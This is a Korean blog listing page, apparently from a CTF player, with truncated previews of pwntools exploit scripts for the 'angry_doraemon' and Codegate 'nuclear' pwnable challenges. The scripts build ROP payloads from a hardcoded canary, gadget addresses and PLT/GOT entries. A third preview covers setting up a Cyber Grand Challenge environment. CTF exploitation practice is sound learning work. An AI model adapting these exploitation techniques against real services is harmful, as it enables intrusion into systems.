angry_doraemon exploit only from pwntools from pwn import * elf = ELF('./angry')rop = ROP(elf) read_plt,write_plt = elf.plt['read'], elf.plt['write']read_got,write_got = elf.got['read'], elf.got['write'] conn = remote('localhost', 8888) sleep(2.3) payload = "4\n" conn.send(payload) sleep(0.3) canary = 0x6df37b00ppppr = 0x080495BCboom = 0x08048FC6 payload = "y111111111"payload += p32(canary)payload += "AAAA"payload += "AAAA" payload += ".. 더보기 codegate nuclear pwn tools 사용 from pwn import * elf = ELF("./nuclear")rop = ROP(elf) recv_plt,send_plt = elf.plt['recv'], elf.plt['send']recv_got,send_got = elf.got['recv'], elf.got['send'] ppppr = 0x0804917Cboom = 0x08048B5B print "read_plt : " + str(hex(recv_plt))print "send_plt : " + str(hex(send_plt))print "read_got : " + str(hex(recv_got))print "send_got : " + str(hex(send_got)) conn = remote('localhost', 1129) payload .. 더보기 CGC ( cyber grand challenge ) 환경 구축 2016 DEFCON에서 CGC 문제가 많이 나왔었고, 그 때 환경 구축을 어떻게 했는지 올린다. CGC를 vagrant라는 툴을 활용해서 구축 해여야 한다. 나는 window에서 했다. https://github.com/ctfs/write-ups-2015/tree/master/defcon-qualifier-ctf-2015/pwnable/cybergrandsandbox 위 주소를 보고 따라 했다. http://repo.cybergrandchallenge.com/boxes/ 여기서 Vagrantfile을 받는다. https://www.vagrantup.com/downloads.html 여기서 vagrant window 버전을 받는다. https://www.virtualbox.org/ 여기서 virtual .. 더보기 이전 1 2 3 4 5 6 7 ··· 19 다음
